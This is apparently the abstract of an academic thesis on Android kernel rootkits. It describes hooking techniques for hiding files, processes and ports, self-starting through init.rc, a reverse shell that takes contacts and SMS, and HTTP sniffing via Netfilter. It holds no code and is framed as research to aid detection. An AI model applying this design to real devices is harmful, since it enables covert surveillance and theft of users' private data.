| With the widespread popularity of Android mobile phones,the security problems are also increasing.Most of the backdoors in Android use rootkit technology.Many unscrupulous manufacturers and hackers can install such backdoors into mobile phones through various illegal means.The common consumer cannot sence the danger.Kernel-level rootkits rely on their secrecy and durability to allow attackers to obtain data from the target machine.Now rootkits prevent detection by changing the corresponding software execution flow at the kernel level.Therefore,understanding and evaluating these technologies can better detect rootkits to prevent the leakage of personal and even corporate privacy.This article studies the source code of the Android operating system and implements four security functions based on Rootkit technology: hidden,self-booting,remote control,and data sniffing.The reverse shell connection program pre-embedded in the mobile phone at the attack end can be self-started during the boot period.It can not only remotely control the target mobile phone through the shell connection,but also transfer files.The hidden and data sniffing module can be transmitted to the target mobile phone via it.These modules can be used to hide files,processes,modules,communication ports and they can capture user sensitive information.Firstly,the implementation of the hidden function based on Rootkit is studied.The Hooking System Call,API Hook,VFS Hook and Inline Hook are used to implement the control of modules` loading and hiding,file hiding and process hiding of the function module.The implementation of Rootkit in this article is mainly based on loadable module technology.Modifying the init function of the module and the show function of the sequence operation through the API Hook technology implements the functions of the control module loading,module and communication port hiding.The hiding of files and processes is achieved through hijack calls,VFS Hooks,and Inline Hook technologies.Secondly,the process self-starting technology based on rootkit is studied.I analyze the Android startup process to find the time point when the rootkit implements the self-start function.Using the init syntax to add the corresponding service and command to the init.rc startup script,which solves the problem of self-booting of the module and self-booting of the executable file on the console..Third,the remote control technology based on Rootkit is studied.The attacker establishes reverse shell connection with the target mobile phone.The attacker is in a listening state and the controlled end connect it.During the connection process,the character string and the file are distinguished by sending a flag structure.The attacker can send a commonly used shell command to the controlled end.After the controlled end executes the result,the result is resent to the attack end.Through the connection,the file can also be sent to the controlled end and the attacker can get the address book,short message and other files from the controlled end.Finally,the network sniffing technology based on Rootkit is studied.By analyzing the Netfilter module's Hook in IPv4,the packets entering the upper protocol stack are filtered.By setting the filter port to 80,packets based on the http protocol are captured.The sniffed packets are used to analyze the http protocol header and the sensitive information that may be involved.The last packet capture program uses the netfilter module to capture data packets based on http protocol communication. |
PDF Full Text Request